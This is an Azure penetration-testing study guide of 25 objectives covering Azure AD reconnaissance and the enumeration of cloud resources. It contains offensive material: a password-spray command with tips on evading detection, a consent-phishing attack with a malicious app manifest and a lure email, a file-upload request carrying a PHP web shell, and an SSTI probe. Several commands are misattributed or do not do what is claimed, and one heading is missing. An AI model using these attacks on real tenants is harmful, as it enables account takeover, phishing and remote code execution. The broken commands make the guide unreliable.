Azure Pentesting

Learning Objective 1 - Information Gathering on Azure AD

  • Tool Used: AADInternals
  • Purpose:
    • To gather foundational information about the target organization's Azure Active Directory (Azure AD) environment.
  • General Tasks:
    • Verify the presence and usage of Azure AD within the target organization.
    • Identify the Azure AD Tenant ID which is crucial for further targeted attacks or assessments.
    • Validate and enumerate email IDs associated with the organization's domain.
    • Discover Azure Services being utilized by the organization to plan subsequent penetration testing steps.
  • General Commands and Techniques:
#Import the AADInternals module, assuming it's installed in the default directory 
Import-Module C:\\Path\\To\\AADInternals\\AADInternals.psd1

Retrieve login information for a suspected user or a generic user if unknown

Get-AADIntLoginInformation -UserName example@targetdomain.com

Acquire the Tenant ID using the organization's domain

Get-AADIntTenantID -Domain targetdomain.com - Use tools like o365creeper to validate and scrape email IDs which can be useful for crafting phishing campaigns or brute-force attacks. - Utilize MicroBurst or similar tools to enumerate Azure services, gaining insights into potential points of vulnerability or valuable targets within the Azure environment.

This generalized approach ensures that the penetration tester has the necessary initial insights to effectively assess the security posture of an organization's Azure AD setup, guiding further specific testing activities.

Learning Objective 2 - Brute Force and Azure Portal Enumeration

  • Tool Used: MSOLSpray
  • Purpose:
    • To perform a controlled brute-force attack on identified user accounts within the target organization's Azure AD to validate credentials.
    • To enumerate vital Azure AD components through the Azure Portal once access is gained.
  • General Tasks:
    • Execute a password spray attack against a list of known or guessed user emails to find valid credentials.
    • Once credentials are obtained, log into the Azure portal to gather detailed information on users, groups, devices, directory roles, and enterprise applications.
  • General Commands and Techniques:
# Use MSOLSpray to perform a password spray attack 
Invoke-MSOLSpray -UserList C:\\Path\\To\\useremails.txt -Password GuessThis!123  # Login to Azure portal using valid credentials 
# Navigate to https://portal.azure.com and authenticate using the obtained credentials

- **Brute Force Tips:**
    - Use a common password across all users to avoid account lockouts.
    - Target non-peak hours for the attack to reduce the chance of detection.
- **Azure Portal Enumeration Tips:**
    - After gaining access, explore the Azure Active Directory section in the portal to review:
        - Users and their roles
        - Group memberships and associated permissions
        - Registered devices and their compliance status
        - Roles assigned within Azure AD and any custom administrative roles
        - Enterprise applications and their configurations, permissions, and associated users/groups

This approach equips the penetration tester with a method to gain initial footholds within an organization’s Azure environment and subsequently leverage this access to perform comprehensive enumeration, crucial for deeper security assessments.

Learning Objective 3 - PowerShell Enumeration of Azure AD

  • Tools Used: AzureAD PowerShell Module
  • Purpose:
    • To leverage PowerShell for deep enumeration of Azure AD elements, gaining insights into users, groups, devices, and roles within the target organization.
  • General Tasks:
    • Connect to Azure AD using PowerShell to pull comprehensive information about the organizational structure and security posture.
    • Enumerate details about users, groups, devices, directory roles, and enterprise applications using AzureAD PowerShell commands.
  • General Commands and Techniques:

Connect to Azure AD with credentials

Import-Module AzureAD $UserCredential = Get-Credential Connect-AzureAD -Credential $UserCredential

Enumerate all users

Get-AzureADUser -All $true

Enumerate all groups

Get-AzureADGroup -All $true

Enumerate all registered devices

Get-AzureADDevice -All $true

- **Detailed Commands:**
    - To pull detailed attributes of users or specific filtering:
        
        `Get-AzureADUser -All $true | Select DisplayName, UserPrincipalName, ObjectId`
        
    - For groups, to get members and their roles:
        
        `Get-AzureADGroupMember -ObjectId <GroupObjectId>`
        
    - For directory roles, particularly to identify global administrators:
        
        `Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq "Global Administrator"} Get-AzureADDirectoryRoleMember -ObjectId <RoleId>

This methodology provides a systematic approach for security professionals to scrutinize the Azure AD setup through PowerShell, allowing for targeted and effective penetration testing maneuvers based on discovered configurations and roles.

Learning Objective 4 - Using Az PowerShell for Resource Enumeration

  • Tool Used: Az PowerShell Module
  • Purpose:
    • To utilize the Az PowerShell module for comprehensive enumeration of Azure resources, which is essential for understanding the scope of assets and services deployed by the target organization.
  • General Tasks:
    • Authenticate and connect to the Azure environment to enumerate resources such as virtual machines, app services, storage accounts, and role assignments.
  • General Commands and Techniques:
# Authenticate and connect to Azure 
Connect-AzAccount  
# List all Azure virtual machines 
Get-AzVM  
# List all app services 
Get-AzWebApp  
# List all role assignments 
Get-AzRoleAssignment  
# Enumerate storage accounts 
Get-AzStorageAccount

- **Detailed Commands:**
    - For a detailed view of specific resource groups or to filter resources by location:
        `Get-AzResourceGroup | Where-Object {$_.Location -eq "East US"} Get-AzVM -ResourceGroupName "YourResourceGroupName"`
    - To review the network security groups and their rules:
        `Get-AzNetworkSecurityGroup | Select-Object Name, SecurityRules`
    - For deeper insights into managed identities and their permissions:
        `Get-AzUserAssignedIdentity`

This objective gears the penetration tester with the necessary tools and commands to deeply explore Azure resources, offering insights into the deployment architecture and potential security weak points that could be exploited during a pen test.

Learning Objective 5 - AZ CLI for Azure Resource Enumeration

  • Tool Used: Azure Command Line Interface (AZ CLI)
  • Purpose:
    • To leverage the Azure Command Line Interface for querying and managing Azure services directly from the command line, providing a powerful way to access a wide array of Azure services efficiently.
  • General Tasks:
    • Authenticate to Azure using the CLI and enumerate resources such as virtual machines, web apps, and storage accounts to uncover their configurations and security postures.
  • General Commands and Techniques:

Log in to Azure

az login -u username@domain.com -p YourPassword

List all virtual machines in all resource groups

az vm list --output table

List all Azure web apps

az webapp list --output table

Get details about storage accounts

az storage account list --output table

- **Detailed Commands:**
    - To view details about specific resources or to filter them by tags or other attributes:
        `az vm show --name VMName --resource-group ResourceGroupName az webapp show --name AppName --resource-group ResourceGroupName`
    - To inspect network interfaces and their associated public IP addresses:
        `az network nic list --query "[].{Name:name, IP:ipConfigurations[0].publicIpAddress.id}"`
    - For checking compliance and policies applied to resources:
        `az policy assignment list --output table`

This setup equips penetration testers with the capability to perform quick and extensive reconnaissance of Azure resources using the CLI, which is crucial for identifying misconfigurations and potential security vulnerabilities that can be targeted during assessments.

Learning Objective 6 - ROADTools for Advanced Enumeration

  • Tool Used: ROADTools
  • Purpose:
    • To use ROADTools, a suite of Python tools for interacting with Azure AD, to gain insights into Azure AD structures and permissions that are typically harder to visualize or access via standard tools.
  • General Tasks:
    • Utilize ROADTools to enumerate detailed information about Azure AD tenants, including application roles, permissions, and service principals.
  • General Commands and Techniques:

Setup ROADTools

python3 -m pip install roadtools roadlib

Authenticate to Azure AD using ROADRecon

roadrecon

Explore Azure AD tenant's roles, permissions, and configurations

This opens up a web interface to interactively query Azure AD data

- **Detailed Use Cases:**
    - Identify misconfigured application permissions that could allow escalation of privileges.
    - Find service principals with high-level permissions and assess their access controls.
    - Visualize relationships and dependencies within Azure AD to identify potential attack paths.

This objective guides penetration testers on using advanced tools like ROADTools to dive deeper into the Azure AD architecture, uncovering nuanced details that can highlight critical security gaps or misconfigurations. This insight is vital for comprehensive Azure security assessments.

Learning Objective 7 - StormSpotter for Visualizing Azure AD

  • Tool Used: StormSpotter
  • Purpose:
    • To utilize StormSpotter, a tool designed to collect and visualize Azure AD and Azure resources, helping to understand complex relationships and configurations that could impact security.
  • General Tasks:
    • Use StormSpotter to map out the Azure AD landscape, including relationships between users, groups, applications, and service principals.
  • General Commands and Techniques:

Set up StormSpotter

git clone https://github.com/Azure/Stormspotter 
cd Stormspotter 
az login 
python3 -m venv ssenv source ssenv/bin/activate 
pip install -r requirements.txt 
python3 stormspotter.py --collect

After collection, use the StormSpotter dashboard to visualize the data

- **Detailed Use Cases:**
    - Identify overly permissive relationships between users and critical resources.
    - Visualize service principal connections and their permissions to assess risk levels.
    - Detect unusual patterns or configurations that deviate from best practices.

This objective helps penetration testers and security analysts visualize and analyze Azure environments in a structured and graphical manner, providing clear insights into potential security weaknesses and the overall security posture of Azure deployments.

Learning Objective 8 - BloodHound for Azure AD Analysis

  • Tool Used: BloodHound
  • Purpose:
    • To employ BloodHound, a powerful tool for analyzing trust relationships within an Active Directory (AD) environment, adapted for Azure AD to identify paths that attackers might exploit to gain escalated privileges.
  • General Tasks:
    • Utilize BloodHound with its Azure AD ingestor to collect and analyze data regarding Azure AD components such as users, groups, and roles.
  • General Commands and Techniques:

Setup BloodHound with Azure AD ingestor

git clone https://github.com/BloodHoundAD/BloodHound.git 
cd BloodHound

Use SharpHound to collect data from Azure AD

Invoke-BloodHound -CollectionMethod All -Domain targetdomain.com -JSONFolder path/to/output

Analyze data in BloodHound GUI

Launch BloodHound GUI and import the JSON data collected

- **Detailed Use Cases:**
    - Map out user permissions and group memberships to identify potential privilege escalation paths.
    - Analyze trust relationships between users, groups, and computers to find the shortest path to high-value targets.
    - Examine effective permissions and group policies that apply to critical assets to ensure there are no unintended access rights.

This objective equips penetration testers with the means to perform an in-depth assessment of Azure AD using BloodHound, identifying critical pathways and relationships that could be exploited in an attack scenario. This analysis is crucial for understanding how an attacker might navigate an Azure AD environment to escalate privileges or access sensitive information.

  • Purpose:
    • To execute an illicit consent grant attack, which exploits the OAuth consent framework in Azure AD, allowing attackers to obtain access to user data without the user’s direct credentials.
  • General Tasks:
    • Create a malicious Azure AD application that requests permissions beyond what is necessary, tricking a user into granting those permissions.
    • Use phishing techniques to persuade users to grant consent to the malicious application.
  • General Commands and Techniques:

Register a new Azure AD application

az ad app create --display-name "TrustedApp" --reply-urls "http://localhost/myapp" --required-resource-accesses @manifest.json

Example manifest.json for requesting permissions

[
    {
        "resourceAppId": "00000003-0000-0000-c000-000000000000",
        "resourceAccess": [
            {
                "id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
                "type": "Scope"
            }
        ]
    }
]

Phishing email example

Subject: New Required Application for All Users Body: Please authorize the new application to enhance your productivity. Click here: [Authorization Link]

- **Detailed Use Cases:**
    - After obtaining consent, the malicious app can access user data as per the granted permissions, which could include reading emails, accessing documents, and more.
    - The attacker can automate the access to exfiltrate data or manipulate services within the victim’s environment.

This objective highlights a sophisticated method of attack that bypasses traditional authentication mechanisms by abusing the OAuth consent framework. Penetration testers can use this technique to demonstrate the potential risks of consent phishing and the importance of implementing strict controls on application permissions within Azure AD.

Learning Objective 10 - Compromise via Insecure File Upload

  • Purpose:
    • To exploit insecure file upload mechanisms within Azure App Services to gain unauthorized access or execute arbitrary code on the server.
  • General Tasks:
    • Identify and exploit file upload vulnerabilities in web applications hosted on Azure App Services that allow the uploading and execution of malicious files.
  • General Commands and Techniques:

Example of exploiting a file upload form

POST /upload HTTP/1.1 
Host: vulnerable-app.azurewebsites.net 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary 
Content-Length: length  

------WebKitFormBoundary 
Content-Disposition: form-data; name="file"; filename="exploit.php" Content-Type: application/x-php  

<?php echo shell_exec($_GET['cmd']); ?> 
------WebKitFormBoundary--

- **Detailed Use Cases:**
    - Check if the server improperly handles file types, allowing for the upload of scripts or executables.
    - After uploading, access the uploaded file via a direct URL to execute the script, potentially gaining remote code execution or other malicious outcomes.
    - Assess the permissions associated with the service principal linked to the App Service to understand the potential impact of the compromise.

This objective demonstrates how a seemingly simple vulnerability can lead to significant security breaches, particularly in cloud environments where multiple services and applications are interconnected. It underscores the importance of securing file upload functionalities and regularly auditing the security configuration of cloud-hosted applications.

Learning Objective 11 - SSTI in Azure App Services

  • Purpose:
    • To identify and exploit Server-Side Template Injection (SSTI) vulnerabilities within applications hosted on Azure App Services, potentially leading to Remote Code Execution (RCE).
  • General Tasks:
    • Discover template injection points within application pages and attempt to inject template syntax that can be processed by the server.
  • General Commands and Techniques:

Example of exploiting SSTI by injecting template syntax

POST /page HTTP/1.1 
Host: vulnerable-app.azurewebsites.net 
Content-Type: application/x-www-form-urlencoded 
Content-Length: length  

input={{7*'7'}}

This will output '49' if the server processes it as a template

- **Detailed Use Cases:**
    - Exploit template engines like Jinja2 or Twig by injecting code that performs operations not intended by the developer, such as accessing environment variables or executing shell commands.
    - Use discovered vulnerabilities to gain insights into the server's environment or elevate privileges.

Learning Objective 12 - Attacking Azure Functions

  • Purpose:
    • To exploit vulnerabilities in Azure Functions, such as insecure configurations or exposed sensitive information, for unauthorized access or data exfiltration.
  • General Tasks:
    • Enumerate Azure Functions within the target environment and identify misconfigurations or security flaws.
  • General Commands and Techniques:

Example command to list Azure Functions

az functionapp list --query "[].{Name:name, ResourceGroup:resourceGroup}"

- **Detailed Use Cases:**
    - Inspect Azure Functions for weak authentication methods or exposed administrative interfaces.
    - Examine the function code for secrets or keys stored in plaintext which could be used to access other Azure services.

Learning Objective 13 - Exploiting Azure Logic Apps

  • Purpose:
    • To identify and exploit vulnerabilities in Azure Logic Apps that could lead to unauthorized actions being triggered or data being leaked.
  • General Tasks:
    • Analyze the Logic Apps for insecure triggers or actions that could be manipulated by an attacker.
  • General Commands and Techniques:

Example command to retrieve details about Logic Apps

az logicapp action list --resource-group YourResourceGroup --name YourLogicAppName

- **Detailed Use Cases:**
    - Manipulate Logic Apps to trigger unintended workflows or exfiltrate data via misconfigured actions.
    - Check for the inappropriate exposure of sensitive data through logging or notifications.

Learning Objective 14 - Azure Key Vault Penetration Testing

  • Purpose:
    • To test Azure Key Vault for vulnerabilities that could allow unauthorized access to stored secrets, keys, or certificates.
  • General Tasks:
    • Attempt to access Key Vault resources without proper permissions and exploit common configuration errors.
  • General Commands and Techniques:

Example command to list Key Vaults and their properties

az keyvault list --output table

- **Detailed Use Cases:**
    - Test access controls on Key Vaults to ensure that only authorized users and applications can retrieve stored secrets.
    - Explore backup and recovery procedures to check for vulnerabilities that could be exploited to access Key Vault contents without direct permissions.

Learning Objective 15 - Azure Active Directory B2C Security Testing

  • Purpose:
    • To evaluate the security of Azure Active Directory B2C, focusing on custom policies, user flows, and external identities management.
  • General Tasks:
    • Assess the configuration and implementation of Azure AD B2C for weaknesses that could be exploited to compromise user identities or manipulate authentication flows.
  • General Commands and Techniques:
# Example command to list all B2C policies 
az ad b2c policy list --output table

- **Detailed Use Cases:**
    - Analyze custom user flows and policies for vulnerabilities that could allow account takeover or unauthorized access.
    - Investigate the integration of external identity providers for security flaws that could be used to bypass authentication mechanisms.

These objectives provide a comprehensive guide to advanced Azure AD penetration testing, detailing specific tactics and strategies for exploiting common and complex vulnerabilities within the Azure ecosystem.

Learning Objective 16 - Azure Container Instances Security Assessment

  • Purpose:
    • To assess the security posture of Azure Container Instances, focusing on container configurations, network policies, and potential vulnerabilities.
  • General Tasks:
    • Identify and evaluate the deployment configurations of Azure Container Instances for misconfigurations and vulnerabilities that may lead to unauthorized access or data leakage.
  • General Commands and Techniques:
# List all Azure Container Instances and their properties 
az container list --output table

- **Additional Details:**
    - Review the network configurations and environment variables of container instances to ensure they do not expose sensitive information.
    - Examine the permissions assigned to the containers to ensure they are operating under the principle of least privilege.

Learning Objective 17 - Azure Service Bus Security Testing

  • Purpose:
    • To evaluate the security of Azure Service Bus by testing for misconfigurations, unauthorized access, and insecure integration with other services.
  • General Tasks:
    • Perform tests on Azure Service Bus namespaces, queues, and topics to identify and exploit configuration flaws or improper access controls.
  • General Commands and Techniques:
# Retrieve details about Service Bus namespaces 
az servicebus namespace list --query "[].{Name:name, Location:location}"

- **Additional Details:**
    - Check for overly permissive shared access policies that could allow unauthorized message publishing or consumption.
    - Assess the encryption and access policies for queues and topics to prevent data exfiltration.

Learning Objective 18 - Azure Event Hubs Security Analysis

  • Purpose:
    • To analyze Azure Event Hubs for security vulnerabilities that could allow unauthorized event injection, data leakage, or service disruption.
  • General Tasks:
    • Inspect the configuration and access controls of Event Hubs to ensure that data streams are secure and only accessible by authorized entities.
  • General Commands and Techniques:
# List all Event Hubs and their associated entities 
az eventhubs namespace list --output table

- **Additional Details:**
    - Verify that network rules and firewall settings are configured to limit access to trusted sources.
    - Analyze consumer groups for unauthorized access that could lead to data leakage.

Learning Objective 19 - Azure SQL Database Penetration Testing

  • Purpose:
    • To conduct penetration tests on Azure SQL Database to identify SQL injection vulnerabilities, misconfigurations, and inadequate access controls.
  • General Tasks:
    • Explore Azure SQL Databases for potential SQL injection points, improper database configurations, and weak authentication practices.
  • General Commands and Techniques:
# Query information about SQL databases, their configurations, and firewall rules 
az sql db list --resource-group YourResourceGroup --server YourSqlServerName --output table

- **Additional Details:**
    - Test for SQL injection vulnerabilities using both manual and automated tools to ensure database queries are properly sanitized.
    - Examine firewall rules and virtual network configurations to ensure they do not allow access from unauthorized networks.

Learning Objective 20 - Security Assessment of Azure Logic Apps

  • Purpose:
    • To perform security assessments on Azure Logic Apps to uncover insecure triggers, actions, and potential abuse scenarios.
  • General Tasks:
    • Analyze Logic Apps for security weaknesses in the workflows, especially focusing on external triggers and actions that interact with sensitive data.
  • General Commands and Techniques:
# Detailed review of Logic Apps configurations and connections 
az logicapp action list --resource-group YourResourceGroup --name YourLogicAppName

- **Additional Details:**
    - Inspect Logic Apps for usage of default credentials or inappropriate exposure of sensitive information within actions or triggers.
    - Evaluate the security of connections used by Logic Apps to integrate with other Azure services or external applications.

These objectives extend the penetration testing framework into specialized Azure services, providing detailed techniques and commands to effectively assess and ensure their security.

Learning Objective 21 - Azure Active Directory Conditional Access Policy Assessment

  • Purpose:
    • To evaluate the effectiveness and security implications of Conditional Access policies applied within Azure Active Directory.
  • General Tasks:
    • Review and test Conditional Access policies to ensure they effectively mitigate unauthorized access and align with the organization's security policies.
  • General Commands and Techniques:
# List all Conditional Access policies 
az ad sp list --filter "displayName eq 'Conditional Access Policy'"

- **Additional Details:**
    - Examine the conditions and controls applied by the policies, such as user location, device state, and authentication challenges.
    - Simulate scenarios to validate the enforcement of these policies under various conditions, ensuring they function as intended without introducing security risks.

Learning Objective 22 - Azure Network Security Group (NSG) Rules Review

  • Purpose:
    • To audit and test Azure Network Security Group (NSG) rules to identify overly permissive or conflicting rules that could expose Azure resources to attacks.
  • General Tasks:
    • Perform a detailed review of NSG rules applied to Azure virtual networks and subnets.
  • General Commands and Techniques:
# Display NSG rules for a specific network security group 
az network nsg rule list --nsg-name YourNSGName --resource-group YourResourceGroup

- **Additional Details:**
    - Check for rules that allow inbound traffic from the internet to sensitive ports or services.
    - Assess the order and priority of NSG rules to ensure that security policies are enforced as expected.

Learning Objective 23 - Azure Subscription and Resource Group Security Review

  • Purpose:
    • To conduct security reviews of Azure Subscriptions and Resource Groups to ensure that administrative permissions and resource configurations adhere to security best practices.
  • General Tasks:
    • Audit roles and permissions assigned to Azure Subscriptions and Resource Groups.
  • General Commands and Techniques:
# List roles and permissions for a specific subscription 
az role assignment list --subscription YourSubscriptionId

- **Additional Details:**
    - Verify that only necessary permissions are granted to users and groups to minimize the risk of privilege escalation.
    - Ensure that resource locks and policies are in place to prevent unauthorized changes or deletions.

Learning Objective 24 - Azure App Configuration and App Service Environment Security Testing

  • Purpose:
    • To test the security of Azure App Configuration and App Service Environments, focusing on authentication mechanisms, configuration settings, and potential vulnerabilities.
  • General Tasks:
    • Identify and exploit weaknesses in Azure App Configuration and App Service Environments.
  • General Commands and Techniques:
# Retrieve configuration settings and connection strings 
az appconfig kv list --name YourAppConfigName --resource-group YourResourceGroup

- **Additional Details:**
    - Test for insecure default configurations that might allow unauthorized access or data leakage.
    - Explore custom domain configurations and TLS settings to ensure they are secure against man-in-the-middle attacks.

Learning Objective 25 - Comprehensive Azure Security Best Practices Review

  • Purpose:
    • To consolidate findings from the penetration testing efforts and review them against Azure security best practices and compliance requirements.
  • General Tasks:
    • Compile security testing results, identify patterns of misconfigurations, and recommend remediations based on Azure security best practices.
  • General Commands and Techniques:
# General review of security health 
az security assessment list

- **Additional Details:**
    - Utilize Azure Security Center to get insights into security posture and potential vulnerabilities.
    - Compare findings with industry standards like CIS Benchmarks and ensure compliance with regulatory requirements.

These objectives round out the extensive penetration testing and security review efforts across various Azure services and configurations, providing a thorough and in-depth approach to securing Azure environments.